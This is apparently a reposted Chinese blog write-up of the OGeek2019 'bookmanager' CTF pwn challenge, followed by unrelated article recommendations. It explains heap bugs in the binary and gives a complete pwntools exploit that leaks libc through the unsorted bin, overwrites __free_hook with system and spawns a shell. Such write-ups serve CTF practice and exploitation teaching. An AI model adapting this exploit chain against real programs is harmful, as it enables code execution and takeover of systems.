当前位置: 开发笔记 > 编程语言 > 正文

OGeek2019bookmanager

作者：6易0k醉人也s易 | 来源：互联网 | 2023-09-24 17:46

OGeek2019-bookmanager总结本题比较简单，就是题目流程比较复杂一点，用到的知识点就一个：当chunk被放置到unsortedbin中时，其fd指针会指向main_

OGeek2019-bookmanager
- 总结
- checksec
- 题目分析
- 漏洞分析
- 利用思路
- 最终EXP
- 引用与参考

OGeek2019-bookmanager

总结

本题比较简单，就是题目流程比较复杂一点，用到的知识点就一个：

当chunk被放置到unsorted bin中时，其fd指针会指向main_arena+88这个地址，可以用来泄露libc地址

checksec

技术分享图片

保护全开，题目运行环境为ubuntu 16.04， libc-2.23.so。

题目分析

题目实现了对书的管理，包括章节、主题等。书所需要的内存都是从堆上分配的。

首先，分配0x90大小的内存，存放书的信息，结构如下：

技术分享图片

然后，每一个章节的结构，也是0x90大小的chunk，内存布局如下：

技术分享图片

然后每个section都是大小为0x40的chunk，其内存布局如下：

技术分享图片

text_ptr对应的大小由用户指定，输入大小不超过0x100

漏洞分析

漏洞点有4处，有两处在add_text函数中：

技术分享图片

第40行可以输入负数绕过校验，第45和47行，如果输入小于0x100的正数，则会越界写。

第三处在remove_section函数中：

技术分享图片

这里存在一个UAF漏洞。

第四出在updapte函数中：

技术分享图片

同样是会越界写，指定了写的大小为0x100。

其实还有一个，就是我标注的read_off_by_one函数，会越界写一个字节。但是也要注意，这个函数里有memset(addr, 0, len)，会把内存置为0。

利用思路

利用思路很多，因为题目漏洞给得实在是太多了，分享我的利用过程如下：

分配一个0x100大小的chunk，作为一个存储text的内存块，前面紧挨着一个0x90的内存块，可以被用作chapter

使用掉高地址的chapter，然后update低地址的text块。由于会把0xff的内存刷为0，所以必须要构造0x100大小的text内存块。直接填满0x100个a后。

使用book_preview，就会打印出unsorted bin的fd内容，得到libc地址

用update的越界写，修改某个section的text_ptr指针，修改为__free_hook的地址

然后update那个section的text，就是在往__free_hook写内容，填上system地址

释放带有/bin/sh的内存块，即可获得shell

最终EXP

泄露地址：

技术分享图片

修改text_ptr：

技术分享图片

修改__free_hook为system地址：

技术分享图片

from pwn import * LOG_ADDR = lambda x, y: info("{} ===> {}".format(x, hex(y))) sh = process("./pwn") libc = ELF(‘libc-2.23.so‘) context.update(arch="amd64", os="linux", endian="little") def add_book(book_name): sh.sendlineafter("Name of the book you want to create: ", book_name) def add_chapter(chapter_name="abc"): assert len(chapter_name) <= 20, "len error!" sh.sendlineafter("\nYour choice:", "1") sh.sendlineafter("\nChapter name:", chapter_name) def add_section(chapter_name="abc", section_name="123"): sh.sendlineafter("\nYour choice:", "2") sh.sendlineafter("\nWhich chapter do you want to add into:", chapter_name) leak_msg = sh.recvline() log.info("msg recv===>{}".format(leak_msg)) sh.sendlineafter("Section name:", section_name) return leak_msg def add_text(section_name="123", size:int=0x80, text="a"): sh.sendlineafter("\nYour choice:", "3") sh.sendlineafter("\nWhich section do you want to add into:", section_name) sh.sendlineafter("\nHow many chapters you want to write:", str(size)) sh.sendlineafter("\nText:", text) def remove_chapter(chapter_name="abc"): sh.sendlineafter("\nYour choice:", "4") sh.sendlineafter("\nChapter name:", chapter_name) def remove_section(section_name="123"): sh.sendlineafter("\nYour choice:", "5") sh.sendlineafter("\nSection name:", section_name) def remove_text(section_name="123"): sh.sendlineafter("\nYour choice:", "6") sh.sendlineafter("\nSection name:", section_name) def book_preview(): sh.sendlineafter("\nYour choice:", "7") sh.recvuntil("\nBook:") msg = sh.recvuntil("\n==========================") log.info("msg recv:{}".format(msg)) return msg def update(mode=0, old_name="abc", new_name="efg"): sh.sendlineafter("\nYour choice:", "8") sh.recvuntil("\nWhat to update?(Chapter/Section/Text):") if mode == 0: sh.sendline("Chapter") sh.sendlineafter("\nChapter name:", old_name) sh.sendlineafter("\nNew Chapter name:", new_name) sh.recvuntil("\nUpdated") elif mode == 1: sh.sendline("Section") sh.sendlineafter("\nSection name:", old_name) sh.sendlineafter("\nNew Section name:", new_name) sh.recvuntil("\nUpdated") else: sh.sendline("Text") sh.sendlineafter("\nSection name:", old_name) sh.sendafter("\nNew Text:", new_name) sh.recvuntil("\nUpdated") # leak libc addr add_book("xxe") add_chapter("a") add_section("a", "a.a") add_text("a.a", 0xf0, "a.a.a") add_chapter("b") add_section("b", "b.a") remove_chapter("b") update(2, "a.a", "a" * 0x100) msg = book_preview() idx = msg.index(b"\x7f") leak_libc_addr = u64(msg[idx-5:idx + 1].ljust(8, b"\x00")) LOG_ADDR("leak_libc_addr", leak_libc_addr) libc_base_addr = leak_libc_addr - 0x3c4b20 - 88 LOG_ADDR("libc_base_addr", libc_base_addr) libc.address = libc_base_addr # recover update(2, "a.a", flat("a"*0xf0, 0, 0x91)) add_chapter("b") add_section("b", "b.a") remove_text("a.a") add_text("a.a", 0xb0, "a.a.b") # change section‘s text_ptr add_section("a", "/bin/sh") layout = [0xb0 * "a", 0, 0x41, "/bin/sh".ljust(8, "\x00"), [0] * 3, libc.sym["__free_hook"], 32] update(2, "a.a", flat(layout, length=0x100, filler="\x00")) # fill system addr at __free_hook update(2, "/bin/sh", flat([libc.sym[‘system‘]], length=0x100, filler="\x00")) # get shell remove_section("/bin/sh") sh.interactive()

远程打：

技术分享图片

引用与参考

1、My Blog

2、Ctf Wiki

推荐阅读

js
解决映射文件中重复属性字段问题

探讨如何在映射文件中处理重复的属性字段，以避免数据操作时出现错误。 ... [详细]

蜡笔小新 2024-11-22 11:48:50
main
网络流24题——试题库问题

题目描述：假设一个试题库中有n道试题。每道试题都标明了所属类别。同一道题可能有多个类别属性。现要从题库中抽取m道题组成试卷。并要求试卷包含指定类型的试题。试设计一个满足要求的组卷算 ... [详细]

蜡笔小新 2024-11-22 11:33:55
js
程序员的精神世界与职业追求

本文探讨了程序员这一职业的本质，认为他们是专注于问题解决的专业人士。文章深入分析了他们的日常工作状态、个人品质以及面对挑战时的态度，强调了编程不仅是一项技术活动，更是个人成长和精神修炼的过程。 ... [详细]

蜡笔小新 2024-11-21 18:56:08
input
UVALive 8201 - BBP 公式计算圆周率

在1995年，Simon Plouffe 发现了一种特殊的求和方法来表示某些常数。两年后，Bailey 和 Borwein 在他们的论文中发表了这一发现，这种方法被命名为 Bailey-Borwein-Plouffe (BBP) 公式。该问题要求计算圆周率 π 的第 n 个十六进制数字。 ... [详细]

蜡笔小新 2024-11-21 18:32:57
format
SIP基础概览

本文介绍了SIP（Session Initiation Protocol，会话发起协议）的基本概念、功能、消息格式及其实现机制。SIP是一种在IP网络上用于建立、管理和终止多媒体通信会话的应用层协议。 ... [详细]

蜡笔小新 2024-11-21 17:42:08
format
二维码的实现与应用

本文介绍了二维码的基本概念、分类及其优缺点，并详细描述了如何使用Java编程语言结合第三方库（如ZXing和qrcode.jar）来实现二维码的生成与解析。 ... [详细]

蜡笔小新 2024-11-21 17:10:15
format
IC卡操作功能实现

本文介绍了如何通过C#语言调用动态链接库（DLL）中的函数来实现IC卡的基本操作，包括初始化设备、设置密码模式、获取设备状态等，并详细展示了将TextBox中的数据写入IC卡的具体实现方法。 ... [详细]

蜡笔小新 2024-11-21 11:02:19
main
深入理解C++构造函数

本文详细介绍了C++中的构造函数，包括其定义、特点以及如何通过构造函数进行对象的初始化。此外，还探讨了转换构造函数的概念及其在不同情境下的应用，以及如何避免不必要的隐式类型转换。 ... [详细]

蜡笔小新 2024-11-21 10:41:14
js
iOS 应用生命周期详解

本文详细介绍了iOS应用的生命周期，包括各个状态及其转换过程中的关键方法调用。 ... [详细]

蜡笔小新 2024-11-20 23:23:07
js
在Notepad++中配置Markdown语法高亮及实时预览功能

本文详细介绍了如何在Notepad++中配置Markdown语法高亮和实时预览功能，包括必要的插件安装和设置步骤。 ... [详细]

蜡笔小新 2024-11-22 13:03:49
js
利用无代码平台实现高效业务应用开发

随着市场环境的变化加速，全球企业都在探索更为敏捷的应用开发模式，以便快速响应新兴的商业机遇。然而，传统的软件开发方式不仅成本高昂，而且耗时较长，这往往导致IT与业务部门之间的合作障碍，进而影响项目的成功。本文将探讨如何通过无代码开发平台解决这些问题。 ... [详细]

蜡笔小新 2024-11-22 11:09:21
js
为何Compose与Swarm之后仍有Kubernetes的诞生？

探讨在已有Compose和Swarm的情况下，Kubernetes是如何以其独特的设计理念和技术优势脱颖而出，成为容器编排领域的领航者。 ... [详细]

蜡笔小新 2024-11-22 09:26:11
python
使用 Python3 和 sqlacodegen 从现有数据库生成 ORM Model 文件

本文介绍了如何通过安装 sqlacodegen 和 pymysql 来根据现有的 MySQL 数据库自动生成 ORM 的模型文件（model.py）。此方法适用于需要快速搭建项目模型层的情况。 ... [详细]

蜡笔小新 2024-11-22 01:13:04
js
支付宝免费提现攻略详解

在日常生活中，支付宝已成为不可或缺的支付工具之一。本文将详细介绍如何通过支付宝实现免费提现，帮助用户更好地管理个人财务，避免不必要的手续费支出。 ... [详细]

蜡笔小新 2024-11-21 16:47:52
python
我的读书清单（持续更新）

我的读书清单（持续更新）201705311.《一千零一夜》2006（四五年级）2.《中华上下五千年》2008（初一）3.《鲁滨孙漂流记》2008（初二）4.《钢铁是怎样炼成的》20 ... [详细]

蜡笔小新 2024-11-21 13:01:23

6易0k醉人也s易

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章